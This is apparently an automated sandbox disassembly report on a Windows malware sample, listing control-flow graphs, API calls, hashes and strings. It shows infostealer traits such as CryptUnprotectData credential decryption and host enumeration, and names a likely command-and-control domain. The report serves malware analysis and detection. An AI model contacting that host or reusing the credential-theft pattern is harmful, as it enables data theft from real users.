                                                                                                                  control_flow_graph 95 4228a8-4228ab 96 4228c2-4228cb 95->96 97 4228b2-4228b9 95->97 98 422a80 95->98 99 422c91-422c97 call 408040 95->99 100 422b86-422b9f 95->100 101 422a86-422a8c call 408040 95->101 102 422a95 95->102 103 422a9b-422b43 95->103 104 422c8b 95->104 105 422a6e-422a78 95->105 109 4228d7-4228da 96->109 110 4228cd-4228d5 96->110 97->96 98->101 121 422ca0-422ca9 call 408040 99->121 111 422ba0-422bb2 100->111 101->102 102->103 108 422b50-422b64 103->108 104->99 105->98 108->108 114 422b66-422b76 call 420680 108->114 115 4228e1-42298f call 408030 109->115 110->115 111->111 116 422bb4-422c35 111->116 122 422b7b-422b7e 114->122 124 422990-4229de 115->124 119 422c40-422c5e 116->119 119->119 120 422c60-422c83 call 420230 119->120 120->104 132 422cb0 121->132 122->100 124->124 127 4229e0-4229f0 124->127 130 4229f2-4229f9 127->130 131 422a11-422a1e 127->131 133 422a00-422a0f 130->133 134 422a43 131->134 135 422a20-422a28 131->135 136 422cb6-422cc2 132->136 133->131 133->133 138 422a47-422a67 GetLogicalDrives call 43c070 134->138 137 422a30-422a3f 135->137 137->137 139 422a41 137->139 138->98 138->99 138->100 138->101 138->102 138->104 138->105 138->121 138->132 138->136 142 422e30-422ed5 138->142 143 422cdf-422d72 138->143 139->138 145 422ee0-422f24 142->145 144 422d80-422dc2 143->144 144->144 146 422dc4-422e04 144->146 145->145 147 422f26-422f62 145->147 150 422e10-422e23 146->150 151 422f70-422f82 147->151 150->150 152 422e25 150->152 151->151 153 422f84 151->153 152->142 153->153
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DrivesLogical
                                                                                                                  • String ID: 7.l$7.l$RT$^!P
                                                                                                                  • API String ID: 999431828-3477192934
                                                                                                                  • Opcode ID: 5d787efca701a18f52e87d36dda2b2bdcbeb7538f9fd1822f6bab23becfd1a80
                                                                                                                  • Instruction ID: 15f22e5365e44fac4e8dd0b875b66722e8f94ddaf6c00cd4c3737f2dc822db09
                                                                                                                  • Opcode Fuzzy Hash: 5d787efca701a18f52e87d36dda2b2bdcbeb7538f9fd1822f6bab23becfd1a80
                                                                                                                  • Instruction Fuzzy Hash: A5F10DB06183409FD710DF55D98126BBBF0FB86304F54896DE899AB366C378C906CB8A

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 154 418a48-418a4f 155 418a61-418a7a call 43b800 154->155 156 418a80 154->156 157 418c00-418c02 154->157 158 418d03 154->158 159 418a95-418a9b call 408040 154->159 160 418aa4-418aaf 154->160 161 4189a7-418a0b 154->161 162 418a46 154->162 163 418a86 154->163 164 418a56-418a5e call 408040 154->164 165 418a8c-418a92 call 408040 154->165 166 4188ff-418963 154->166 155->156 170 418c10-418c16 157->170 178 418d0d-418d14 158->178 159->160 167 418ab0-418ab9 160->167 171 418a10-418a34 161->171 162->154 164->155 165->159 169 418970-418994 166->169 167->167 176 418abb-418ac2 167->176 169->169 179 418996-4189a4 call 401db0 169->179 170->170 180 418c18-418c54 170->180 171->171 181 418a36-418a3d call 401db0 171->181 184 418ac4-418ac9 176->184 185 418acb 176->185 186 418d34-418d82 call 41c9a0 * 2 178->186 179->161 188 418c56-418c59 180->188 189 418c5b 180->189 181->162 191 418ace-418b0b call 408030 184->191 185->191 208 418d24-418d2e 186->208 209 418d84-418d97 call 41c9a0 186->209 188->189 195 418c5c-418c73 188->195 189->195 204 418b10-418b6c 191->204 199 418c75-418c78 195->199 200 418c7a 195->200 199->200 203 418c7b-418c92 call 408030 199->203 200->203 203->178 211 418c94-418ccd call 43b800 203->211 204->204 207 418b6e-418b7d 204->207 212 418ba1-418bc0 207->212 213 418b7f-418b84 207->213 208->186 208->211 223 418d20 209->223 224 418d99-418dbc 209->224 221 418cd2-418cfc CryptUnprotectData 211->221 216 418be1-418bfa call 408c60 212->216 217 418bc2-418bc9 212->217 215 418b90-418b9f 213->215 215->212 215->215 216->157 222 418bd0-418bdf 217->222 221->155 221->156 221->158 221->159 221->160 221->163 221->164 221->165 222->216 222->222 223->208 224->208 226 418dc2-418ddc call 41c9a0 224->226 226->208 229 418de2-418df5 226->229 229->208
                                                                                                                  APIs
                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00418CEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                  • String ID: <7+0$B$P^$\
                                                                                                                  • API String ID: 834300711-3035337080
                                                                                                                  • Opcode ID: bdeea8c14914bec16e16bea6ab82c1f90df1e7dfe7fce7e43c57d33763c95337
                                                                                                                  • Instruction ID: 9117f44ace41229e70de94badf4a8ca47e8b9aef6a674a708b7d3d64af525580
                                                                                                                  • Opcode Fuzzy Hash: bdeea8c14914bec16e16bea6ab82c1f90df1e7dfe7fce7e43c57d33763c95337
                                                                                                                  • Instruction Fuzzy Hash: F2C124B6A083418FD724CF24C89579FB7E1EF95304F09492EE48997391EB389845CB46

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 230 408870-408881 call 439850 233 4089d2-4089d4 ExitProcess 230->233 234 408887-40888e call 433180 230->234 237 408894-4088b7 GetCurrentProcessId GetCurrentThreadId 234->237 238 4089cd call 439d70 234->238 240 4088b9-4088bb 237->240 241 4088bd-40890c SHGetSpecialFolderPathW GetForegroundWindow 237->241 238->233 240->241 242 408912-4089a7 241->242 243 4089a9-4089c1 call 409a30 241->243 242->243 243->238 246 4089c3 call 40c900 243->246 248 4089c8 call 40b400 246->248 248->238
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00408894
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040889D
                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088EF
                                                                                                                  • GetForegroundWindow.USER32 ref: 00408904
                                                                                                                  • ExitProcess.KERNEL32 ref: 004089D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4063528623-0
                                                                                                                  • Opcode ID: 43df9f6dec1794d0aecb39decac8833d665b09034ebe72d3b5c0dd88d144fadc
                                                                                                                  • Instruction ID: 2fdc60a93d28710b0cd175d4a777b9100b7534f652ffd6ab37f8d50b1fae6fcb
                                                                                                                  • Opcode Fuzzy Hash: 43df9f6dec1794d0aecb39decac8833d665b09034ebe72d3b5c0dd88d144fadc
                                                                                                                  • Instruction Fuzzy Hash: 78310873E0071817C3143AB99C4A369B59A9BC0724F1F513FAE86AB3D2EDBD8C0545C9

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 250 42b0e3-42b127 call 43b800 254 42b130-42b18e 250->254 254->254 255 42b190-42b198 254->255 256 42b19a-42b19f 255->256 257 42b1ad 255->257 259 42b1a0-42b1a9 256->259 258 42b1b0-42b1be 257->258 260 42b1c0-42b1c1 258->260 261 42b1db-42b66b FreeLibrary call 43b800 GetComputerNameExA 258->261 259->259 262 42b1ab 259->262 263 42b1d0-42b1d9 260->263 267 42b670-42b6b4 261->267 262->258 263->261 263->263 267->267 268 42b6b6-42b6bb 267->268 269 42b6dd-42b6e3 268->269 270 42b6bd-42b6c7 268->270 272 42b6e6-42b6ee 269->272 271 42b6d0-42b6d9 270->271 271->271 273 42b6db 271->273 274 42b6f0-42b6f1 272->274 275 42b70b-42b746 GetComputerNameExA 272->275 273->272 277 42b700-42b709 274->277 276 42b750-42b762 275->276 276->276 278 42b764-42b769 276->278 277->275 277->277 279 42b76b-42b772 278->279 280 42b78d-42b790 278->280 281 42b780-42b789 279->281 282 42b793-42b79b 280->282 281->281 283 42b78b 281->283 284 42b7ab-42b7e4 282->284 285 42b79d-42b79f 282->285 283->282 288 42b7f0-42b7fc 284->288 286 42b7a0-42b7a9 285->286 286->284 286->286 288->288 289 42b7fe-42b803 288->289 290 42b805-42b809 289->290 291 42b81d 289->291 292 42b810-42b819 290->292 293 42b820-42b828 291->293 292->292 294 42b81b 292->294 295 42b82a-42b82b 293->295 296 42b83b-42b87e call 43b800 293->296 294->293 297 42b830-42b839 295->297 301 42b880-42b904 296->301 297->296 297->297 301->301 302 42b90a-42b90f 301->302 303 42b911-42b918 302->303 304 42b92d-42b930 302->304 306 42b920-42b929 303->306 305 42b933-42b941 304->305 307 42ba77-42baaf 305->307 308 42b947-42b94f 305->308 306->306 309 42b92b 306->309 311 42bab0-42bad4 307->311 310 42b950-42b95d 308->310 309->305 312 42b970-42b976 310->312 313 42b95f-42b964 310->313 311->311 314 42bad6-42bae3 311->314 316 42b9c0-42b9ce 312->316 317 42b978-42b97b 312->317 315 42b993 313->315 318 42bae5-42bae6 314->318 319 42bafb-42bafe call 42e990 314->319 321 42b996-42b99a 315->321 324 42b9d0-42b9d3 316->324 325 42ba2f-42ba38 316->325 317->316 320 42b97d-42b990 317->320 322 42baf0-42baf9 318->322 329 42bb03-42bb22 319->329 320->315 328 42b99c-42b9a5 321->328 322->319 322->322 324->325 330 42b9d5-42ba2a 324->330 326 42ba42-42ba45 325->326 327 42ba3a-42ba3d 325->327 331 42ba70-42ba72 326->331 332 42ba47-42ba6b 326->332 327->328 328->307 333 42b9ab-42b9ad 328->333 330->321 331->315 332->315 333->310 334 42b9af 333->334 334->307
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042B1E3
                                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B650
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                                  • String ID: 74;2
                                                                                                                  • API String ID: 2904949787-2613046512
                                                                                                                  • Opcode ID: 0e377140fcb1c585446d757eaf89cd8bd9efaf1d8ba53a5f0c1aade27a5f2094
                                                                                                                  • Instruction ID: c9dd994f55d1cf543acc5411ab0634e220a0874542a1252c8c9bd8573c59c7b1
                                                                                                                  • Opcode Fuzzy Hash: 0e377140fcb1c585446d757eaf89cd8bd9efaf1d8ba53a5f0c1aade27a5f2094
                                                                                                                  • Instruction Fuzzy Hash: 9C0237712057918FD7258F39C890762BBE2EF96300F1D859EC4D68B793C779A842CBA4

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 596 40c97b-40c98b 597 40c990-40c9b5 596->597 597->597 598 40c9b7-40c9f4 call 408710 call 435880 597->598 603 40ca00-40ca37 598->603 603->603 604 40ca39-40ca9f 603->604 605 40caa0-40cafc 604->605 605->605 606 40cafe-40cb0f 605->606 607 40cb11-40cb1f 606->607 608 40cb54 606->608 609 40cb20-40cb29 607->609 610 40cb58-40cb60 608->610 609->609 611 40cb2b 609->611 612 40cb62-40cb63 610->612 613 40cb7b-40cb88 610->613 611->610 614 40cb70-40cb79 612->614 615 40cb8a-40cb95 613->615 616 40cbad 613->616 614->613 614->614 618 40cba0-40cba9 615->618 617 40cbb1-40cbb9 616->617 619 40cbcb-40ccff 617->619 620 40cbbb-40cbbf 617->620 618->618 621 40cbab 618->621 623 40cd00-40cd4a 619->623 622 40cbc0-40cbc9 620->622 621->617 622->619 622->622 623->623 624 40cd4c-40cd78 623->624 625 40cd80-40cdb6 624->625 625->625 626 40cdb8-40cde6 call 40b430 625->626 628 40cdeb-40ce11 626->628
                                                                                                                  Strings
                                                                                                                  • tacitglibbr.biz, xrefs: 0040CDE1
                                                                                                                  • 88FE57294B3FC45EE430B6CE554835A9, xrefs: 0040C9C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 88FE57294B3FC45EE430B6CE554835A9$tacitglibbr.biz
                                                                                                                  • API String ID: 0-4267815069
                                                                                                                  • Opcode ID: 483499d02bbe12feb61667cde9647466b7d832abe09e5f14a4e1c7d524797fa7
                                                                                                                  • Instruction ID: bbf81f0760fca7c08bc221ef1c3e51b8340ee4abbe1fbc1be906c63b7a9b9e55
                                                                                                                  • Opcode Fuzzy Hash: 483499d02bbe12feb61667cde9647466b7d832abe09e5f14a4e1c7d524797fa7
                                                                                                                  • Instruction Fuzzy Hash: 14B102B564D3908BD338CF24D4917EFBBE1ABD6300F18896EC4DA6B391D77848058B86
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: 6543$@
                                                                                                                  • API String ID: 2994545307-3564168940
                                                                                                                  • Opcode ID: d0334cf39d2bdf1043e93597f5300b02dbb4d2223a31d5ed95101b081ea64827
                                                                                                                  • Instruction ID: 5cf5a725ecd8c7379691a97a9daa1d9505c43bf6e4ed69b2554d4391442ca438
                                                                                                                  • Opcode Fuzzy Hash: d0334cf39d2bdf1043e93597f5300b02dbb4d2223a31d5ed95101b081ea64827
                                                                                                                  • Instruction Fuzzy Hash: 4F4149B16042018BDB18CF24C89577B77F5FF99318F14952ED486AB392E739D908CB86
                                                                                                                  APIs
                                                                                                                  • LdrInitializeThunk.NTDLL(0043BEAB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E1E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 7(
                                                                                                                  • API String ID: 0-3832224305
                                                                                                                  • Opcode ID: 68b2afe561c01ee91116204d12b0dfa01caa74b8d1c2de12960563918693ffee
                                                                                                                  • Instruction ID: 3b7bb95ef2d2f74051047dfb603a013a75dc9fc2134849f86c35aa37d8f9a990
                                                                                                                  • Opcode Fuzzy Hash: 68b2afe561c01ee91116204d12b0dfa01caa74b8d1c2de12960563918693ffee
                                                                                                                  • Instruction Fuzzy Hash: CB51BCB7EA83584BC3208FD49CC0773B6A2E7D6300F19842CDAC02B755E9B59D069BC6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: a204f27aaeac8ada477e8f3fb69e99628460e46cea5074a9c6f9414710ce2bad
                                                                                                                  • Instruction ID: 234686714594285b1e20d19de97384e69317631695e650a40d04bd971bcbfc65
                                                                                                                  • Opcode Fuzzy Hash: a204f27aaeac8ada477e8f3fb69e99628460e46cea5074a9c6f9414710ce2bad
                                                                                                                  • Instruction Fuzzy Hash: 05714FB5B447209BD714AB25EC9273F73A5DFC1314F98843EE9829B382E67C9C05835A

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 339 42b621-42b66b call 43b800 GetComputerNameExA 343 42b670-42b6b4 339->343 343->343 344 42b6b6-42b6bb 343->344 345 42b6dd-42b6e3 344->345 346 42b6bd-42b6c7 344->346 348 42b6e6-42b6ee 345->348 347 42b6d0-42b6d9 346->347 347->347 349 42b6db 347->349 350 42b6f0-42b6f1 348->350 351 42b70b-42b746 GetComputerNameExA 348->351 349->348 353 42b700-42b709 350->353 352 42b750-42b762 351->352 352->352 354 42b764-42b769 352->354 353->351 353->353 355 42b76b-42b772 354->355 356 42b78d-42b790 354->356 357 42b780-42b789 355->357 358 42b793-42b79b 356->358 357->357 359 42b78b 357->359 360 42b7ab-42b7e4 358->360 361 42b79d-42b79f 358->361 359->358 364 42b7f0-42b7fc 360->364 362 42b7a0-42b7a9 361->362 362->360 362->362 364->364 365 42b7fe-42b803 364->365 366 42b805-42b809 365->366 367 42b81d 365->367 368 42b810-42b819 366->368 369 42b820-42b828 367->369 368->368 370 42b81b 368->370 371 42b82a-42b82b 369->371 372 42b83b-42b87e call 43b800 369->372 370->369 373 42b830-42b839 371->373 377 42b880-42b904 372->377 373->372 373->373 377->377 378 42b90a-42b90f 377->378 379 42b911-42b918 378->379 380 42b92d-42b930 378->380 382 42b920-42b929 379->382 381 42b933-42b941 380->381 383 42ba77-42baaf 381->383 384 42b947-42b94f 381->384 382->382 385 42b92b 382->385 387 42bab0-42bad4 383->387 386 42b950-42b95d 384->386 385->381 388 42b970-42b976 386->388 389 42b95f-42b964 386->389 387->387 390 42bad6-42bae3 387->390 392 42b9c0-42b9ce 388->392 393 42b978-42b97b 388->393 391 42b993 389->391 394 42bae5-42bae6 390->394 395 42bafb-42bafe call 42e990 390->395 397 42b996-42b99a 391->397 400 42b9d0-42b9d3 392->400 401 42ba2f-42ba38 392->401 393->392 396 42b97d-42b990 393->396 398 42baf0-42baf9 394->398 405 42bb03-42bb22 395->405 396->391 404 42b99c-42b9a5 397->404 398->395 398->398 400->401 406 42b9d5-42ba2a 400->406 402 42ba42-42ba45 401->402 403 42ba3a-42ba3d 401->403 407 42ba70-42ba72 402->407 408 42ba47-42ba6b 402->408 403->404 404->383 409 42b9ab-42b9ad 404->409 406->397 407->391 408->391 409->386 410 42b9af 409->410 410->383
                                                                                                                  APIs
                                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B650
                                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042B721
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ComputerName
                                                                                                                  • String ID: 74;2
                                                                                                                  • API String ID: 3545744682-2613046512
                                                                                                                  • Opcode ID: a3c95d1cae347bb82dce8e974d34056801db8078145ca8302a7a1107be973abc
                                                                                                                  • Instruction ID: 4f06352ef8816ea675b9983930539fd211b23acf7a922de14625fc5bffaa1d73
                                                                                                                  • Opcode Fuzzy Hash: a3c95d1cae347bb82dce8e974d34056801db8078145ca8302a7a1107be973abc
                                                                                                                  • Instruction Fuzzy Hash: 83B1F3702047918FE7158F39D850732BFE2EFA6304F28859ED4D68B792C7799842CBA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 542 43a92f-43a94d GetForegroundWindow * 2
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 0043A92F
                                                                                                                  • GetForegroundWindow.USER32 ref: 0043A935
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ForegroundWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2020703349-0
                                                                                                                  • Opcode ID: 262ded6f0fc6756cb2a69c95e7e47d3379ab44c0c67f255a44d651c4b16913c6
                                                                                                                  • Instruction ID: 1206cc42ca0957667e450426facbddbc2952e795b2ff34e2790f480194ce9914
                                                                                                                  • Opcode Fuzzy Hash: 262ded6f0fc6756cb2a69c95e7e47d3379ab44c0c67f255a44d651c4b16913c6
                                                                                                                  • Instruction Fuzzy Hash: 04C04C38561D40EFC6048F24FC5D5343726B705245310643AD413C63B6DB349809CA18
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(E8A416A2,00000000,B6B58CB3), ref: 00409AEF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1029625771-0
                                                                                                                  • Opcode ID: 56dff4f8bcc4accb531d48fa8cc47d4cbedb4db9a90ea6a41831faa44498286f
                                                                                                                  • Instruction ID: c6f9b6d51d577ba26e22898352ec388f61cbabad47315b0f0ea3d5a6b5670c14
                                                                                                                  • Opcode Fuzzy Hash: 56dff4f8bcc4accb531d48fa8cc47d4cbedb4db9a90ea6a41831faa44498286f
                                                                                                                  • Instruction Fuzzy Hash: A61106743983504BD3049FB5D8907ABBBD5DBE6304F18893EA2D16B391C27C94068B57
                                                                                                                  APIs
                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 00433981
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DefaultLanguageUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 95929093-0
                                                                                                                  • Opcode ID: f3f87bbd72dc02260c30e3ae5b7116bffff979ed0794b041be2dba84b2d1c71b
                                                                                                                  • Instruction ID: dc3a6c972a9b93b16ff27444efc03cb3ccca3178f3acdf7ef73c2ad5c9848447
                                                                                                                  • Opcode Fuzzy Hash: f3f87bbd72dc02260c30e3ae5b7116bffff979ed0794b041be2dba84b2d1c71b
                                                                                                                  • Instruction Fuzzy Hash: 2311CA32E086A68FCB15CF788D542ADBB725F86120F4983ADC8A9B73D5D5304946CB91
                                                                                                                  APIs
                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B357,00000000,00000001), ref: 00439DC2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: ddfad08af3818a3282c1be2e13e1813404b47d4e0b7dd71cdbd5fbf32133f5de
                                                                                                                  • Instruction ID: a7f614b0da677e3024e6d14a98963a5d3270485aee8bd6adad4514946c06c77d
                                                                                                                  • Opcode Fuzzy Hash: ddfad08af3818a3282c1be2e13e1813404b47d4e0b7dd71cdbd5fbf32133f5de
                                                                                                                  • Instruction Fuzzy Hash: D9E02B36808211BBC7001F38BC07F5B3A64DF8B760F01483AF40096112EF79E801C59E
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,?,00439DDB,?,0040B357,00000000,00000001), ref: 0043858E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3298025750-0
                                                                                                                  • Opcode ID: 4d27a9eb09a83c038c697b2d49ea1aef4cc9dc8f399a98f750e8c4bce1e860c2
                                                                                                                  • Instruction ID: dc4db906ef4abdc6062e1ec96b6ffb3d7f96c39e0b630dcc26a530c02356fe47
                                                                                                                  • Opcode Fuzzy Hash: 4d27a9eb09a83c038c697b2d49ea1aef4cc9dc8f399a98f750e8c4bce1e860c2
                                                                                                                  • Instruction Fuzzy Hash: 02D0C935819622EFCA511F14FC0AB9A3B68EF0B33AF4648B5A504AB173C775DC508AD8
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  • Opcode ID: 1bb015d751bccc7e1b65caa3d199434df52486843717f7038fd04ea52af1d71a
                                                                                                                  • Instruction ID: 75aac33b15391c90e2742bf576256fc7d56d31493ce6768c953f00bc94e4aacc
                                                                                                                  • Opcode Fuzzy Hash: 1bb015d751bccc7e1b65caa3d199434df52486843717f7038fd04ea52af1d71a
                                                                                                                  • Instruction Fuzzy Hash: 61F06774508701DFD314DF68D5A8B1ABBF0FB89708F10481CE4968B3A0D7B5A949DF82
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  • Opcode ID: 55bbcebe619f4518c91a9bf09d85cc53cdbe2441480fe7ee5ab18dcae6a62715
                                                                                                                  • Instruction ID: dd1717d23431f6f681abbaa4f2c49bd438863432c7c7db0f5c118dfe783689f4
                                                                                                                  • Opcode Fuzzy Hash: 55bbcebe619f4518c91a9bf09d85cc53cdbe2441480fe7ee5ab18dcae6a62715
                                                                                                                  • Instruction Fuzzy Hash: B4F062B450C3419FE314DF28C5A871BBBE0BB89348F11891DF4998B390C7BA9648DF86
                                                                                                                  APIs
                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C913
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
